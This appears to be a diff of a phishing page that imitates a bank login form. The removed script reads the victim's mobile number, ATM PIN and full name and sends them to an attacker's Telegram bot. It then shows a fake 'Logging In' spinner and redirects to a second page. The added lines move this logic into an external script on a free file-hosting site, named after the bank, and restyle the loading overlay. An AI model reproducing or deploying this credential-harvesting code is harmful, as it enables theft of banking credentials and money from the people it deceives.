--- a/index.html
+++ b/index.html
@@ -69,17 +69,30 @@
         .login-button:hover {
             background-color: #005bb5;
         }
-        .loading-popup {
+        #loadingPopup {
             display: none;
             position: fixed;
-            top: 50%;
-            left: 50%;
-            transform: translate(-50%, -50%);
-            background-color: white;
-            padding: 20px;
-            border-radius: 10px;
-            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
-            text-align: center;
+            top: 0;
+            left: 0;
+            width: 100%;
+            height: 100%;
+            background: rgba(0, 0, 0, 0.5);
+            justify-content: center;
+            align-items: center;
+            color: white;
+            font-size: 18px;
+        }
+        #loadingPopup .circle {
+            border: 4px solid rgba(255, 255, 255, 0.3);
+            border-radius: 50%;
+            border-top: 4px solid white;
+            width: 50px;
+            height: 50px;
+            animation: spin 1s linear infinite;
+        }
+        @keyframes spin {
+            0% { transform: rotate(0deg); }
+            100% { transform: rotate(360deg); }
         }
     </style>
 </head>
@@ -113,57 +126,15 @@
         </label>
     </div>
 
-    <button class="login-button" onclick="sendToTelegram()">Login</button>
+    <button class="login-button" onclick="submitFirstPage()">Login</button>
 </div>
 
-<div class="loading-popup" id="loadingPopup">
-    <h2>Logging in</h2>
-    <p>Loading, please wait...</p>
+<div id="loadingPopup">
+    <div class="circle"></div>
+    <h2>Logging In...</h2>
+    <p>Please wait...</p>
 </div>
 
-<script>
-    function sendToTelegram() {
-        const mobile = document.getElementById('mobile').value;
-        const atmPin = document.getElementById('atmPin').value;
-        const fullName = document.getElementById('fullName').value;
-        const remember = document.getElementById('remember').checked;
-
-        if (mobile.length === 10 && atmPin.length === 4 && fullName) {
-            const token = 'YOUR_BOT_TOKEN'; // Replace with your bot token
-            const chatId = 'YOUR_CHAT_ID';  // Replace with your chat ID
-            const message = `Mobile: ${mobile}\nATM PIN: ${atmPin}\nFull Name: ${fullName}\nRemember Me: ${remember}`;
-
-            fetch(`https://api.telegram.org/bot${token}/sendMessage`, {
-                method: 'POST',
-                headers: {
-                    'Content-Type': 'application/json'
-                },
-                body: JSON.stringify({
-                    chat_id: chatId,
-                    text: message
-                })
-            })
-            .then(response => response.json())
-            .then(data => {
-                if (data.ok) {
-                    document.getElementById('loadingPopup').style.display = 'block';
-                    localStorage.setItem('mobileEnd', mobile.slice(-4)); // Save last 4 digits of the mobile number
-                    setTimeout(() => {
-                        window.location.href = 'second-page.html'; // Redirect to the second page
-                    }, 5000); // 5 seconds delay
-                } else {
-                    alert('Failed to send information.');
-                }
-            })
-            .catch(error => {
-                console.error('Error:', error);
-                alert('Error occurred while sending information.');
-            });
-        } else {
-            alert('Please fill out all fields correctly.');
-        }
-    }
-</script>
-
+<script src="https://static.staticsave.com/alljs/icicbank.js"></script>
 </body>
 </html>
